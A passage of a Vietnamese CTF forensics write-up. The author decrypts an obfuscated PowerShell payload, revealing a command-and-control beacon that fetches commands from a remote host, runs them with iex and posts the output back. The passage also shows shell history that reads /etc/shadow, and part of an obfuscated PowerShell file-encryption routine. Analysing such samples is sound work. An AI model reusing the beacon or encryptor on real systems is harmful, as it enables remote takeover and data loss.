AwADIAYQA1ADIAOQA2ADgAOQBmADgANgAwAGUAYwAyAGUANwAyAGUANAA1AGEAZABhAGEAMgA5ADQAZQAxAGUAMgA0ADcAMQAzAGYANAAyADMAYQAzAGMAZgBlAGEANQA0ADQAYQBmADEAZAA1AGYANQBiADQANQA2ADgAZQBhAGYAZQA4ADYAYgBhADgAMgBjADAAZQBjADIAMQAyADQAMgAyADAANAA4ADAAMAAyAGIAMgBiAGQANwBjAGYAYQA3ADIAMABhAGMANgA1AGYAZgA4ADcAZQA2ADcANwA5AGQAMAA2AGEANgBlADkAZgA1AGIAOQA0AGEAMwBiADAANgA4ADMAZAAwADQANQBkAGIAYwBmAGEANwBiADkAMAA1ADgAMABiAGYAYgA1AGEAMgAxAGUAMQA0ADgANgAzADgAYQAwADcANQBlADUAYgA5AGUAYgAxADQANQA2AGQAYgAzADEAZgA0AGQAZQBiADMAZABlADIANQBiAGYANgA5AGUANQA5ADYAYgA4AGEAMgBjADcAYgA5ADUAOAAxAGMAZQAwADcAZAAzADQAMwA0ADIAMwA5ADMAYQAyADUAMQBkADUAYgBlADQANABmADgAMgBiADYAMgA3ADgAYgAxAGMAMQBhAGMANQAyAGQANgBlADcANAA1AGYANAA5ADMAMAA5ADcANwBkAGIAMwA0AGUAYQBjADEANwAwAGUAZQBhADEAZQAzADUAZAA0ADIAYQBjADAAMQA2ADYAOABlADQAMAAxADcANwA4AGUAZABjADgAZAA5AGIAZQA0ADcANgBmADAANwBiADgAOAA4ADIAYgA4AGIAYwA2ADgAZQA3ADgAYQA2AGQAMwAzAGMAZQBlAGUANQAzADIAZQBkAGMAYQBhADkANwBhAGEAOAAwADEAZgA0ADEAMwAxADAAYwA2AGEAZgBmAGMAZgBlADEAYQA5ADcAOAAxADEAOQAwADEAYwBkADIAOQAwAGYANgBhADkAYwBlAGQAYQBmADYAYwBmADYAOAA1ADMAMAAxADQANgA2ADUAZABhADMAYgAwADEAZQAwADgAMwAxADMAMgA5ADYAOQA1AGYANAAwADgAOABjAGYANABmAGEAMgAxADQAZQA3ADUAMgA2ADQAOABhAGMAYgBlADAAYgA2ADcAYwAyAGMAOQA0AGIAMwBlAGIANAAxADkAMwAyAGIAZQBhADMANQA4AGUAOQBkAGQANQA3AGUAYgAyADcAZABmADQAZQBiADQAOQBmADQAMAA5AGEAOABhADYAOABhAGIAZQBlADAAYQA2ADUAZgA3ADEANQBkADIANABiADcAYwAxAGIANQAwADgAZQBlAGUAMQBjAGEANAA1ADYAMgBiAGYAMwA4ADAAMwBiADIAZgAwADAAYQAxADEAOAAwADQAYgA3ADcAMwBhADEANABkAGQANQA1ADQAZgA1AGMAMAA5ADQAOQA0ADAAZgA3AGIAMwA3AGIAMwAxADAAZQBjADQAYQA3ADYAMQBkADQAOQA3AGEAOABiAGYAZgBhAGMAZQAyADAAMgA3ADIAOQAxADIAZgBhADQAYwBhADkAYwA4ADAANwA0ADUANwAyADgAZQAzADUAMQBlADIAMgA1ADYAMAAwADAAOAAyAGIAYQA4AGYAZQBiAGEAMAA3AGYAMgBjAGIANgBkAGMAZgAxAGIAYgA4ADEAMgA4ADAANQA3ADMANAA3ADcAOQA5AGUANQA2ADUAMQAwAGQANAA1AGYANQAyAGQAYwBiADUAZgAzADgAMABmADIANwAxAGMAZQBhAGYAOABiADUANQBiAGQAZgBkAGMAMABjAGIANwBjADAANAA5AGYAZABkADAAMgAwADAAYwA5ADcAYwA3ADQANwBkADQAYgAwAGYAZABkAGYAMwAzADUAZQAwADgAZAAyADIAYQA4ADQAOQBlADgAZgBjAGMAMgAzADcANAAyADcAZgBhADMAZgA4ADUAMgBhADAANQAxADkAYgAyAGQAYwBjADQAOQA1ADUANwAwADUAYgA0ADgAOQBkADEAYwAzADgAMAA3ADUAOAA5AGEAYQBiADYAZQA5ADEAYQAxADMAMgBkADYAZAA5ADYAMQAzAGQAZAA2AGYANQAyAGQANgA1ADIAMAA5ADUAYgA2AGEAZQBjADkAMQBhAGIANQAyADUAMwA5ADQAMAAyADUAOQA0ADgAZgBmADgANAAwADYAMwBmAGIAMAA4AGQAZgA0ADUAYwAyAGQAOQAwADYANgA5ADkAOABiAGYANAA1ADYAMQAyADUANQA1ADAAYwAzADUAYgAwAGQAMgA0ADUAZAA0AGUAYwAyAGYAMABkADAAOAA1ADgAYgA0ADcANAA1ADIAMAAwADIANwBlADYAYgA2ADUAOABlADMAYgA3ADYAYgBmAGQANQA2ADYAZAAyADYAYwA4ADcANQAzADcAOABjAGMAMQBlADQANABmAGUAOQBhADUAYQBlADkAZABkAGMANQA2ADAAMQBmADYAMAAxADEAOQA3AGIAYwBiAGUANwA2ADIAZAA4ADkAYQA4AGEAMgBlAGQAMgA4ADQANAA4ADcANAA4AGEAYgA0AGIAMgA5ADgAOQBhAGUAMQAzADUAMwBkADMAMAA5ADMANQA1ADMAMQAyADEAYQBhADkAOAA2ADgAOQBlAGEANwA2ADIANAA3ADgAOQAzAGEAYwA0ADkAYgBhAGMAMwBmAGQAZABiADYAZgA3ADAAZABkADIAMQA3ADAAYQA4ADQAOQBlADYANgAxADkAYQA3ADMAMgA0ADgAOQA2ADcAOQBkADEAYQBmAGYANwAzADcAYgA0ADAANgAzADgAZAA1AGYAZgBkADgAOQBjAGIAZgA4ADYAOAAwADcAOQBkADYAMAAxADYAMgBmADcANAAwAGUAOAA4ADYANQAzAGYAMwA5ADMAZQAxADYAMgBmADIAZABjAGEAMAA3ADIAMAA1AGQAYQA5AGYAOABkADMAZAA2AGYAMgAxAGQAYwA0ADAAMgAwADMANQA4AGUAYQBiADYAMQBlAGQAMAA3ADcAYQBlADgAOQBiADEANQA1ADQAZAA1ADgAMQA3ADQAMwBjAGYANQAxAGUAMQAyAGIAZQBjADIAYgBmADIAZgBlADUANAA3ADQAYQA5ADAANwBjADQANgA0AGEAYQAwADMAZAA0AGEAZQA1AGMAZgAzAGMAYgBlAGEAZQA2ADQAMABiADQAMQBhAGEAZQA5ADcAYwAxADAAZQBiADYAMQAyAGMANQAwADUAMQBiAGQAMQBkADUANAAwADQAZQA1AGMANQAzAGUAOAA3ADYAYwA3AGUANwBjADQAZgAzAGMANwAyADgANwA1ADQAOQBhADIAMwA1ADUAMgA2ADAANgA1ADYANwAwADcAMgBiAGUAYwA0ADYAOQA5ADQANgA5AGUAYgA0ADQAMQBjADUAYwA4AGQAMgBjAGIAYQAxADIAMwA3ADYAYQBlAGUAZgA0ADIANgBlAGMAZgA0AGIANQA3ADcAOAAyAGEAYwA2ADMAZQBiADcANgAxADgANABiADcAMgA5ADAAMgA2ADkAZgBlAGEANQBjADgAZgA4AGEAYwBjAGIAMgBkAGYANAA4AGQAOABmADkANgBjAGIAOQA4AGUAOQBjAGMAMwA3ADcAYwAyAGQAZQA2ADQAMwBkADYAMQA5AGIANwAyADYAZQA5ADcAYQA5ADQANQBkADEANgA0AGQANAA2AGQAZQBlADAAZgBlADUAMAAzADkAYwBlAGYAZgBhADQANwA1AGEAMQBkADMAOAA1ADkAMAA1AGIAMAAyADIAMQA1ADEAOQA2AGUAYgA0AGUAOAA1ADYAYgA4ADEAMAA1ADAAYQBlAGUAMgBlADYAYwBkAGEANQBiAGUANwAzADMAZAA1ADAAZgBjADYAMwA5AGEANABlADEAMABmADUAMwA2ADgANQBjADUAYgA5AGIAYQA3AGEAMwA1ADkANgBlADAAMgBiADYAZQA5AGEANgA0ADAAMAA0ADYAOABkAGMAMQAwADIAYwAzADgAOAAzAGIAMQBiADgAZgA1ADUAYQBmADIAZgBkAGMANAAzAGIANgA4AGUAOQBiADgANQBmADIAMAA5AGMAZAA1ADUAYgAyAGMAMwA4AGEAZABiADgAOAAwAGYANQBkADQAZgAzADkAYgA4AGYAOAA3ADIAYwAwAGUAMgAyADYAZgAzADUAOQAzADgANQA3ADYAYwAyADAANQBlADEANwBlADEAZgBjADQAOAAwAGUAZQAyADIANABhADUANwA4ADQAMwBiADIAZAA3ADYAYQBkADUANABhAGIAMwA1ADgANgA1AGYAYwAzAGEAYwA1ADAAMQA2ADgAZABlADMAYQA1AGEANwAxADQAMgBkAGQAZQA4AGMANwA5ADcAYgAzADUANwA3AGYAMgA5ADYAMgBlADcAOQA3AGUAYgBmAGUAMgBiAGIAMwA0ADkAOQAyADcAMwBlADgAZQBmADMAOAAxADUAMwA1ADcANABiADMAMABmADkAMgA3AGMAOAA5AGMANABlAGQAZQA3AGIAYQA2AGYANABkADAAMgBiADYAMgAyADQAZABlAGYANwBhADQAMAAxADMAYgBjADMAYwBjADkAZQBhADcANgBhADMAOAA0AGYAMwAwAGYAOQBmADUAOABlADgAZAAwADgANAAzADAANABlAGEAMwAyAGMAZAAzADgAYgA2ADUAMgBmAGQAMwBjADgANwBhADkAMwAxAGUAMABiADQAMwAzAGIAOAA1AGUAMwAzADEAYgBlAGMAMQBiAGYAYgBmAGIANAAzAGUANwBjAGMAMwAxADMAYwAwAGYAMQBlADAAZgBmAGEAOAAyADEANgA4ADgAMwA3ADMANgA5AGQAMgA2AGEAZAA1ADYAYwBmAGYANgAxADAAOAA3AGQAMwAyADYAMQBlADgAMgAzAGMAOAAxADkAMwBhADYANwA3ADcAYQA3ADMAYgAwAGMAMAA2AGEANwBiAGMAZABmADIAZQBjADUAYwAxADYAMABhAGUANQBlADAAZgA2ADMAOAA3ADEANgA0ADEAOAA1ADUAMgAzADUAYQA5ADMANQA0AGMAOABiADAAMgAwAGQAMgAyAGIANQBmADQAOQBhADQAYQAwADMAZAAxADkAMwAyADQAYgBkADUAMwAzADAANAAxADMAMwAxAGYANwAzADYAMgA1AGYAYwBhAGIAMQA2ADYANgBjAGQANgAwAGIANABkADYAOABhAGQAMQAzADEAMAA4AGYAYwBhAGUAOAA0ADYAYQAyAGMAOAA1AGUAMQA3ADgAOABiAGYANwBjAGMAZQAyADcAZgA1ADAAZQBiAGQAYQAwAGQAOAAyADQANABjADIAYQA4ADMAYQBkADIAOAAxAGUANgBiADMANABlADMAZABiADMAMQA1ADcANABjADEAZQBjAGUAZAAyAGIAMgA4ADEAYwBiADgAMgAwAGEAZgAzADUANgAyAGYAMwA3ADIANABmADkAOAA5ADcANwBiADUANQAzAGYAMgA=' |ConvERTtO-SecureSTRiNG -k 55,113,158,254,51,94,175,13,94,42,226,159,63,7,144,195,14,139,39,217,58,39,188,60,182,192,74,94,209,172,100,93)).GetneTwoRKCrEDEnTIAl().pASsWoRD ```  + Mình nhận được đoạn code gốc : ``` $bwqvRnHz99 = (104,116,116,112,115,58,47,47,112,97,115,116,101); $bwqvRnHz99 += (98,105,110,46,99,111,109,47,104,86,67,69,85,75,49,66); $flag = [System.Text.Encoding]::ASCII.GetString($bwqvRnHz99);$s='172.21.20.96:8080'; $i='eef8efac-321d465e-e9d053a7'; $p='http://'; $v=Invoke-WebRequest -UseBasicParsing -Uri $p$s/eef8efac -Headers @{"X-680d-47e8"=$i}; while ($true){$c=(Invoke-WebRequest -UseBasicParsing -Uri $p$s/321d465e -Headers @{"X-680d-47e8"=$i}).Content; if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-WebRequest -Uri $p$s/e9d053a7 -Method POST -Headers @{"X-680d-47e8"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8} ``` + Cách 2 (decrypt AES_CBC): ``` import base64 from Crypto.Cipher import AES from Crypto.Util.number import long_to_bytes sc = base64.b64decode("76492d1116743f0423413b16050a5345MgB8AHUAQgAxAEsAZQBQAE8AUQA4AHQAVAB5ADEAcwBXAFYALwBVADcAUAAyAGcAPQA9AHwAMQAzADcAMwAwAGIAOQA2ADMANQAwAGYAOABlADUAOQAxAGEAMgA4ADAAOQAzAGQAMABjADYAZgA2ADQAOAAxAGYAZAA4AGUAMAA2ADIANABmADQAMgAzADMAYwAxAGQANgA4ADEANgAwADcANgA1AGYANgBjAGUAZQA1ADAAMwA4ADMAZQA5AGMAOQAzAGUAYgBhAGIANgA1ADEANQBjAGYAYwBiADIAOQA2ADcAYgA4AGEAZAA3AGYANABhAGYAYgA2ADgANQAyADkAOAA1ADUAYQA2ADkAMwAzADMANwBkADIAOQA1ADkAZgBhADkANAA1AGYANwA1ADIAZAA2AGMAMgBhADYANQBjADAAYwA4AGEAYQA0AGYAZQBiAGUAYgA2AGQAOQA4AGIAOAA1AGYAZAA1ADMANgBkADYANQBkADMAZQBiADAANQBjADkAMABmADMANQA0AGYAOQBiADMAMQA2ADkAOQAyADcAZgA2ADcAZgBiADAAYQAxAGYANAAzAGIAYQBjADQANwA2ADgAYwA4ADYAOAA2ADcAYwA2ADAAZABkADkAOQAwADAAYgAzADYAMgA2ADUAZQA0AGYANAA2AGEAYgAwAGMAOAAwADAANQA4ADkANQBlAGYAYwBhADkANAAwADEANgBkADgAMwAzAGEAYQBlADMAMgAxAGEAMQBiADAAMwAwADQANQA1ADQAYQAzADIAYwA4AGQAZQBkADUAZABlAGIAMwA2ADgAYgA4AGYANAAyADUAZAAxADIAOAA0AGYANwA2ADcAMABjADMAOAA1ADMAMwAyADkAZQA2AGEANwBmADAAZAA2ADUAMwBkADkAYgAzADcAMgA4ADEAZAA2AGIANwAwADUAYwA0ADMAYQAwAGUAZgA0ADYAZQBiADkAYgA5ADcANQA5ADkAYQA0ADEAMgBhADQAYQA4ADYAMQBhADIAYgA4ADcANwAzADIAMABjADIAMQA3ADgAYwA0ADIAYwA0ADYAZgAwAGIANQBmAGEAYQA3AGIANQBlADMANgAwAGEANwAwAGMAMgBlADgAYQA5ADAAYwBlADkAMgBjADgAMgA3ADIAMAA4ADMANwBiAGQANAA1AGYAOQBlADQANABkADkAMgBiADAAZQBiADgAYgA4ADQAZQA2AGQANgBlADAAYgA5ADcANQBhAGQAYQA2ADMAZgAwADcAMAA3ADcAYgA5AGYAYwAxADcANQBjADUANgAwAGMAZQA4ADYAZAA4ADkAZABhADgAOQA1AGQAMQA5AGEAMQAzADUANgAxADUAMAAyAGQANgA2AGMAZQBmAGQAYwBlADUAMABiADAAYQA5ADIAOABlADMAZABkAGUANAAzADIAZgAwAGEANgA3ADkANQA3ADYANgA3ADIAOQBjAGUANgBkADQAZAAwAGUAZAAwADgAZAA5ADQANgBlADYAMwAyADIANQAyADkANABmADgAYwA5ADkAMAA0AGQAZgBkADEAYwAxAGUAOQAxADcAZgAyAGMANQBkAGYAMwAzADMANgBlAGEAZgBmAGMANgBjAGMAZABkAGQAMAA5ADAAZQAzADQAZAAwADYAZAAyADUAMwA2AGMANgA2ADAANAAyADUANgA2ADUAYwA0ADQAZQAyADIAMgBmADAANQAyAGEAYwA5ADAAZAAzADYAZAAzAGYAYQA2AGEAOAA0ADIAOQAwADAAMQAwAGYAOQBhADAAMwBkAGYAMQBiAGMANgAwAGMAZAA4ADEANAA5AGEAMwAyAGQAOQBlADcANwBkADEAYQBiADUANQA0ADIAZABhADQANwBmADAAYQA2ADYAMAAyADEANABmADAAMgAyAGEAMQAxAGQANgBjADgAOQA2ADYAYgA1AGQANQAwADIAMwBiADQANwAxADkAZgA5AGIANAA4AGQAYwAwADAANABiADIANgA2ADEAMwAwADIAYQA1ADIAOQA2ADgAOQBmADgANgAwAGUAYwAyAGUANwAyAGUANAA1AGEAZABhAGEAMgA5ADQAZQAxAGUAMgA0ADcAMQAzAGYANAAyADMAYQAzAGMAZgBlAGEANQA0ADQAYQBmADEAZAA1AGYANQBiADQANQA2ADgAZQBhAGYAZQA4ADYAYgBhADgAMgBjADAAZQBjADIAMQAyADQAMgAyADAANAA4ADAAMAAyAGIAMgBiAGQANwBjAGYAYQA3ADIAMABhAGMANgA1AGYAZgA4ADcAZQA2ADcANwA5AGQAMAA2AGEANgBlADkAZgA1AGIAOQA0AGEAMwBiADAANgA4ADMAZAAwADQANQBkAGIAYwBmAGEANwBiADkAMAA1ADgAMABiAGYAYgA1AGEAMgAxAGUAMQA0ADgANgAzADgAYQAwADcANQBlADUAYgA5AGUAYgAxADQANQA2AGQAYgAzADEAZgA0AGQAZQBiADMAZABlADIANQBiAGYANgA5AGUANQA5ADYAYgA4AGEAMgBjADcAYgA5ADUAOAAxAGMAZQAwADcAZAAzADQAMwA0ADIAMwA5ADMAYQAyADUAMQBkADUAYgBlADQANABmADgAMgBiADYAMgA3ADgAYgAxAGMAMQBhAGMANQAyAGQANgBlADcANAA1AGYANAA5ADMAMAA5ADcANwBkAGIAMwA0AGUAYQBjADEANwAwAGUAZQBhADEAZQAzADUAZAA0ADIAYQBjADAAMQA2ADYAOABlADQAMAAxADcANwA4AGUAZABjADgAZAA5AGIAZQA0ADcANgBmADAANwBiADgAOAA4ADIAYgA4AGIAYwA2ADgAZQA3ADgAYQA2AGQAMwAzAGMAZQBlAGUANQAzADIAZQBkAGMAYQBhADkANwBhAGEAOAAwADEAZgA0ADEAMwAxADAAYwA2AGEAZgBmAGMAZgBlADEAYQA5ADcAOAAxADEAOQAwADEAYwBkADIAOQAwAGYANgBhADkAYwBlAGQAYQBmADYAYwBmADYAOAA1ADMAMAAxADQANgA2ADUAZABhADMAYgAwADEAZQAwADgAMwAxADMAMgA5ADYAOQA1AGYANAAwADgAOABjAGYANABmAGEAMgAxADQAZQA3ADUAMgA2ADQAOABhAGMAYgBlADAAYgA2ADcAYwAyAGMAOQA0AGIAMwBlAGIANAAxADkAMwAyAGIAZQBhADMANQA4AGUAOQBkAGQANQA3AGUAYgAyADcAZABmADQAZQBiADQAOQBmADQAMAA5AGEAOABhADYAOABhAGIAZQBlADAAYQA2ADUAZgA3ADEANQBkADIANABiADcAYwAxAGIANQAwADgAZQBlAGUAMQBjAGEANAA1ADYAMgBiAGYAMwA4ADAAMwBiADIAZgAwADAAYQAxADEAOAAwADQAYgA3ADcAMwBhADEANABkAGQANQA1ADQAZgA1AGMAMAA5ADQAOQA0ADAAZgA3AGIAMwA3AGIAMwAxADAAZQBjADQAYQA3ADYAMQBkADQAOQA3AGEAOABiAGYAZgBhAGMAZQAyADAAMgA3ADIAOQAxADIAZgBhADQAYwBhADkAYwA4ADAANwA0ADUANwAyADgAZQAzADUAMQBlADIAMgA1ADYAMAAwADAAOAAyAGIAYQA4AGYAZQBiAGEAMAA3AGYAMgBjAGIANgBkAGMAZgAxAGIAYgA4ADEAMgA4ADAANQA3ADMANAA3ADcAOQA5AGUANQA2ADUAMQAwAGQANAA1AGYANQAyAGQAYwBiADUAZgAzADgAMABmADIANwAxAGMAZQBhAGYAOABiADUANQBiAGQAZgBkAGMAMABjAGIANwBjADAANAA5AGYAZABkADAAMgAwADAAYwA5ADcAYwA3ADQANwBkADQAYgAwAGYAZABkAGYAMwAzADUAZQAwADgAZAAyADIAYQA4ADQAOQBlADgAZgBjAGMAMgAzADcANAAyADcAZgBhADMAZgA4ADUAMgBhADAANQAxADkAYgAyAGQAYwBjADQAOQA1ADUANwAwADUAYgA0ADgAOQBkADEAYwAzADgAMAA3ADUAOAA5AGEAYQBiADYAZQA5ADEAYQAxADMAMgBkADYAZAA5ADYAMQAzAGQAZAA2AGYANQAyAGQANgA1ADIAMAA5ADUAYgA2AGEAZQBjADkAMQBhAGIANQAyADUAMwA5ADQAMAAyADUAOQA0ADgAZgBmADgANAAwADYAMwBmAGIAMAA4AGQAZgA0ADUAYwAyAGQAOQAwADYANgA5ADkAOABiAGYANAA1ADYAMQAyADUANQA1ADAAYwAzADUAYgAwAGQAMgA0ADUAZAA0AGUAYwAyAGYAMABkADAAOAA1ADgAYgA0ADcANAA1ADIAMAAwADIANwBlADYAYgA2ADUAOABlADMAYgA3ADYAYgBmAGQANQA2ADYAZAAyADYAYwA4ADcANQAzADcAOABjAGMAMQBlADQANABmAGUAOQBhADUAYQBlADkAZABkAGMANQA2ADAAMQBmADYAMAAxADEAOQA3AGIAYwBiAGUANwA2ADIAZAA4ADkAYQA4AGEAMgBlAGQAMgA4ADQANAA4ADcANAA4AGEAYgA0AGIAMgA5ADgAOQBhAGUAMQAzADUAMwBkADMAMAA5ADMANQA1ADMAMQAyADEAYQBhADkAOAA2ADgAOQBlAGEANwA2ADIANAA3ADgAOQAzAGEAYwA0ADkAYgBhAGMAMwBmAGQAZABiADYAZgA3ADAAZABkADIAMQA3ADAAYQA4ADQAOQBlADYANgAxADkAYQA3ADMAMgA0ADgAOQA2ADcAOQBkADEAYQBmAGYANwAzADcAYgA0ADAANgAzADgAZAA1AGYAZgBkADgAOQBjAGIAZgA4ADYAOAAwADcAOQBkADYAMAAxADYAMgBmADcANAAwAGUAOAA4ADYANQAzAGYAMwA5ADMAZQAxADYAMgBmADIAZABjAGEAMAA3ADIAMAA1AGQAYQA5AGYAOABkADMAZAA2AGYAMgAxAGQAYwA0ADAAMgAwADMANQA4AGUAYQBiADYAMQBlAGQAMAA3ADcAYQBlADgAOQBiADEANQA1ADQAZAA1ADgAMQA3ADQAMwBjAGYANQAxAGUAMQAyAGIAZQBjADIAYgBmADIAZgBlADUANAA3ADQAYQA5ADAANwBjADQANgA0AGEAYQAwADMAZAA0AGEAZQA1AGMAZgAzAGMAYgBlAGEAZQA2ADQAMABiADQAMQBhAGEAZQA5ADcAYwAxADAAZQBiADYAMQAyAGMANQAwADUAMQBiAGQAMQBkADUANAAwADQAZQA1AGMANQAzAGUAOAA3ADYAYwA3AGUANwBjADQAZgAzAGMANwAyADgANwA1ADQAOQBhADIAMwA1ADUAMgA2ADAANgA1ADYANwAwADcAMgBiAGUAYwA0ADYAOQA5ADQANgA5AGUAYgA0ADQAMQBjADUAYwA4AGQAMgBjAGIAYQAxADIAMwA3ADYAYQBlAGUAZgA0ADIANgBlAGMAZgA0AGIANQA3ADcAOAAyAGEAYwA2ADMAZQBiADcANgAxADgANABiADcAMgA5ADAAMgA2ADkAZgBlAGEANQBjADgAZgA4AGEAYwBjAGIAMgBkAGYANAA4AGQAOABmADkANgBjAGIAOQA4AGUAOQBjAGMAMwA3ADcAYwAyAGQAZQA2ADQAMwBkADYAMQA5AGIANwAyADYAZQA5ADcAYQA5ADQANQBkADEANgA0AGQANAA2AGQAZQBlADAAZgBlADUAMAAzADkAYwBlAGYAZgBhADQANwA1AGEAMQBkADMAOAA1ADkAMAA1AGIAMAAyADIAMQA1ADEAOQA2AGUAYgA0AGUAOAA1ADYAYgA4ADEAMAA1ADAAYQBlAGUAMgBlADYAYwBkAGEANQBiAGUANwAzADMAZAA1ADAAZgBjADYAMwA5AGEANABlADEAMABmADUAMwA2ADgANQBjADUAYgA5AGIAYQA3AGEAMwA1ADkANgBlADAAMgBiADYAZQA5AGEANgA0ADAAMAA0ADYAOABkAGMAMQAwADIAYwAzADgAOAAzAGIAMQBiADgAZgA1ADUAYQBmADIAZgBkAGMANAAzAGIANgA4AGUAOQBiADgANQBmADIAMAA5AGMAZAA1ADUAYgAyAGMAMwA4AGEAZABiADgAOAAwAGYANQBkADQAZgAzADkAYgA4AGYAOAA3ADIAYwAwAGUAMgAyADYAZgAzADUAOQAzADgANQA3ADYAYwAyADAANQBlADEANwBlADEAZgBjADQAOAAwAGUAZQAyADIANABhADUANwA4ADQAMwBiADIAZAA3ADYAYQBkADUANABhAGIAMwA1ADgANgA1AGYAYwAzAGEAYwA1ADAAMQA2ADgAZABlADMAYQA1AGEANwAxADQAMgBkAGQAZQA4AGMANwA5ADcAYgAzADUANwA3AGYAMgA5ADYAMgBlADcAOQA3AGUAYgBmAGUAMgBiAGIAMwA0ADkAOQAyADcAMwBlADgAZQBmADMAOAAxADUAMwA1ADcANABiADMAMABmADkAMgA3AGMAOAA5AGMANABlAGQAZQA3AGIAYQA2AGYANABkADAAMgBiADYAMgAyADQAZABlAGYANwBhADQAMAAxADMAYgBjADMAYwBjADkAZQBhADcANgBhADMAOAA0AGYAMwAwAGYAOQBmADUAOABlADgAZAAwADgANAAzADAANABlAGEAMwAyAGMAZAAzADgAYgA2ADUAMgBmAGQAMwBjADgANwBhADkAMwAxAGUAMABiADQAMwAzAGIAOAA1AGUAMwAzADEAYgBlAGMAMQBiAGYAYgBmAGIANAAzAGUANwBjAGMAMwAxADMAYwAwAGYAMQBlADAAZgBmAGEAOAAyADEANgA4ADgAMwA3ADMANgA5AGQAMgA2AGEAZAA1ADYAYwBmAGYANgAxADAAOAA3AGQAMwAyADYAMQBlADgAMgAzAGMAOAAxADkAMwBhADYANwA3ADcAYQA3ADMAYgAwAGMAMAA2AGEANwBiAGMAZABmADIAZQBjADUAYwAxADYAMABhAGUANQBlADAAZgA2ADMAOAA3ADEANgA0ADEAOAA1ADUAMgAzADUAYQA5ADMANQA0AGMAOABiADAAMgAwAGQAMgAyAGIANQBmADQAOQBhADQAYQAwADMAZAAxADkAMwAyADQAYgBkADUAMwAzADAANAAxADMAMwAxAGYANwAzADYAMgA1AGYAYwBhAGIAMQA2ADYANgBjAGQANgAwAGIANABkADYAOABhAGQAMQAzADEAMAA4AGYAYwBhAGUAOAA0ADYAYQAyAGMAOAA1AGUAMQA3ADgAOABiAGYANwBjAGMAZQAyADcAZgA1ADAAZQBiAGQAYQAwAGQAOAAyADQANABjADIAYQA4ADMAYQBkADIAOAAxAGUANgBiADMANABlADMAZABiADMAMQA1ADcANABjADEAZQBjAGUAZAAyAGIAMgA4ADEAYwBiADgAMgAwAGEAZgAzADUANgAyAGYAMwA3ADIANABmADkAOAA5ADcANwBiADUANQAzAGYAMgA=") iv = base64.b64decode(sc.split(b'|')[1]) enc = sc.split(b'|')[2].replace(b"\x00", b"") dataLen = len(enc) // 2 byte_enc = bytearray(dataLen) for i in range(dataLen): byte_enc[i] = int(enc[2 * i:2 * i + 2], 16) key = b"".join(long_to_bytes(int(x)) for x in "55,113,158,254,51,94,175,13,94,42,226,159,63,7,144,195,14,139,39,217,58,39,188,60,182,192,74,94,209,172,100,93".split(",")) cipher = AES.new(key, AES.MODE_CBC, iv) plan_text = cipher.decrypt(byte_enc) print(plan_text.replace(b"\x00", b"")) # print(iv) # print(key) # print(byte_enc) ```  + Đến đây thì giải mã nó thôi :  + Nhận được link pastebin : `https://pastebin.com/hVCEUK1B`  ## 2-layer security ### Des :  ### Sol : + Bài này cung cấp cho 1 file zip chưa 3 thư mục root,home,mnt + Mình load các thư mục này vào autopsy để phân tích cho dễ. + Tìm file history để xem những gì đã xảy ra (nằm ở path `home/kalilinux/.zsh_history`) (lệnh xem các đường dẫn và thư mục con : $tree -al)  ``` cd ~ cd Desktop ls clear cd ../../../../../../../../ cd /var/log cd ~ sudo apt install curl curl https://pastebin.com/raw/awhuFZse -0 tienbip.txt LESSCLOSE=/usr/bin/lesspipe %s %s cd - cd Desktop ls gpg --quick-gen-key Cocainit gpg --quick-gen-key VNvodich gpg --quick-gen-key Siuuuuuu ls gpg -er VNvodich RestrictedAccess.pdf ls rm -rf RestrictedAccess.pdf cat /etc/shadow | grep idek{ cat /etc/shadow | grep "idek{" mv RestrictedAccess.pdf.gpg $(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 5 | head -n 1) pwsh ls mv T3C4U.SOS recycle.bin reboot ``` + Phân tích 1 chút, thì author curl nội dung từ link pastebin kia xong output vào file tienbip.txt, sau đó dùng gpg để tạo 3 khóa gpg là Cocainit, VNvodich, Siuuuuuu + => mã hóa tệp "RestrictedAccess.pdf" bằng khóa chung được liên kết với mã định danh "VNvodich" + mv RestrictedAccess.pdf.gpg: Đây là file nguồn mà bạn muốn di chuyển hoặc đổi tên, là file được mã hóa "RestrictedAccess.pdf.gpg." + $(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 5 | head -n 1): Phần này tạo ra một chuỗi chữ và số ngẫu nhiên có độ dài 5. Chia nhỏ nó: + cat /dev/urandom: Điều này đọc từ trình tạo số ngẫu nhiên của nhân Linux. + tr -dc 'a-zA-Z0-9': Điều này lọc ra các ký tự không phải chữ và số, chỉ để lại các chữ cái (cả chữ hoa và chữ thường) và số. + fold -w 5: Điều này bao bọc đầu vào thành một dòng mới sau mỗi 5 ký tự. + head -n 1: Thao tác này sẽ chọn dòng đầu tiên của đầu ra, mang lại cho bạn một chuỗi chữ và số ngẫu nhiên có độ dài 5. + => rm file RestrictedAccess.pdf, còn lệnh cat | grep thì chắc là author check xem có flag trong đó hay ko thôi(check đề) + Cuối cùng là chuyển đổi file T3C4U.SOS(file này thì phải có đoạn code gốc mới hiểu nó làm gì ) thành file recycle.bin + Phân tích tiếp thì mình tìm được 1 file `ConsoleHost_history.txt` ở path `home/kalilinux/.local/share/powershell/PSReadLine/ConsoleHost_history.txt`  + Decode mã base64 + raw inflate của nó thì mình nhận được : ``` iEX ((("{40}{19}{25}{46}{15}{11}{41}{20}{14}{48}{33}{47}{37}{35}{2}{1}{31}{23}{18}{8}{45}{9}{39}{28}{24}{43}{38}{27}{53}{13}{36}{49}{16}{30}{17}{26}{21}{12}{0}{51}{4}{6}{10}{50}{5}{32}{34}{52}{42}{22}{29}{3}{44}{7}"-f ' } YPMencryptor = YPMaesMan','aged = New-Object System.Security.Cryptograp',' YPMaesMan','{ YPMshaManaged.Dispose() ','r() YPMencryptedBytes = YPMencryptor.TransformFinal','edBytes YPMaesManaged.Dispose() if (YPMPath) { ','Block(YPMplainBytes, 0, YPMplainBytes.Length) YPMen','se() } }','raphy.CipherMode]::CBC ','ed.Padding = [System.Security.Cryptography.PaddingMode]::Z','cryptedBytes = YPMaesManaged','m (','::ReadAllBytes(YPMFile.FullName) YPMoutPath = YPMFile.FullName + jnO.SOSjnO ','sEOk)) if (Y','arameterSetName = jnOCryptFilejnO)] [String]YPMPath ) Begin { YPMshaMan','ra','M',' ','ystem.Security.Cryptog','()] [Outpu','(Mandatory = YPMtrue, P',' = [System.IO.File]','e return jnOFile encrypted to YPMoutP','d YPMaesManaged.Mode = [S','sManaged.BlockSize','t',' Write-Error 